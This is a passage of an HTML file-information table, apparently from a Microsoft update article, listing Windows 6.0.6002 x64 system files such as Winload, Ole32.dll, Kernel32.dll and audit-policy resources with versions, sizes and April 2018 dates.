applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi</td><td>6.0.6002.24367</td><td>1,102,528</td><td>28-Apr-2018</td><td>02:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe</td><td>6.0.6002.24362</td><td>1,089,216</td><td>10-Apr-2018</td><td>19:45</td><td>x64</td><td>Not 
applicable</td></tr><tr><td>Winresume.efi</td><td>6.0.6002.24367</td><td>998,080</td><td>28-Apr-2018</td><td>02:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe</td><td>6.0.6002.24259</td><td>986,856</td><td>15-Dec-2017</td><td>14:06</td><td>x64</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,216</td><td>28-Apr-2018</td><td>02:32</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>10,240</td><td>28-Apr-2018</td><td>04:13</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>7,680</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,216</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll</td><td>6.0.6002.24259</td><td>411,368</td><td>15-Dec-2017</td><td>14:06</td><td>x64</td><td>Not applicable</td></tr><tr><td>Driver.stl</td><td>Not applicable</td><td>4,349</td><td>15-Dec-2017</td><td>14:06</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Ole32.dll</td><td>6.0.6002.24367</td><td>1,910,272</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Rpcss.dll</td><td>6.0.6002.24367</td><td>722,432</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>16,896</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>19,968</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,992</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>23,040</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,064</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>02:27</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>02:29</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,064</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>16,384</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>13,824</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>12,800</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>22,016</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>22,016</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>22,016</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>19,968</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>19,968</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Comcat.dll</td><td>6.0.6002.24367</td><td>8,704</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Oleres.dll</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>02:00</td><td>x64</td><td>Not 
applicable</td></tr><tr><td>Csrsrv.dll</td><td>6.0.6002.24367</td><td>86,016</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Kernel32.dll</td><td>6.0.6002.24367</td><td>1,215,488</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>220,672</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>152,064</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>60,928</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>234,496</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,016</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>165,376</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>71,680</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>230,400</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,016</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>156,672</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>66,048</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>250,880</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>160,256</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>71,680</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>278,016</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>187,392</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>74,240</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>224,256</td><td>28-Apr-2018</td><td>02:31</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>02:32</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:33</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:30</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>264,704</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,040</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>184,320</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>67,584</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>227,840</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>21,504</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>160,768</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>68,608</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>281,600</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,040</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>181,248</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>67,584</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>211,456</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>136,192</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>61,440</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>254,464</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>171,008</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>76,288</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>253,440</td><td>28-Apr-2018</td><td>04:12</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,040</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>166,912</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>70,656</td><td>28-Apr-2018</td><td>04:11</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>158,720</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>16,384</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>110,080</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>42,496</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>143,360</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>15,360</td><td>28-Apr-2018</td><td>04:11</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>101,376</td><td>28-Apr-2018</td><td>04:11</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>41,984</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>231,424</td><td>28-Apr-2018</td><td>04:12</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,016</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>153,600</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>65,024</td><td>28-Apr-2018</td><td>04:11</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>243,200</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>165,888</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>70,656</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>261,632</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>180,224</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>72,192</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>265,728</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>181,248</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>68,096</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>260,608</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>181,248</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>67,584</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>257,024</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>22,528</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>163,328</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>74,752</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>231,424</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>21,504</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>161,280</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>65,024</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>231,424</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>20,992</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>159,744</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>60,416</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>121,344</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>87,040</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>126,976</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>89,600</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>35,840</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:53</td><td>x64</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>53,760</td><td>28-Apr-2018</td><td>01:58</td><td>x64</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not 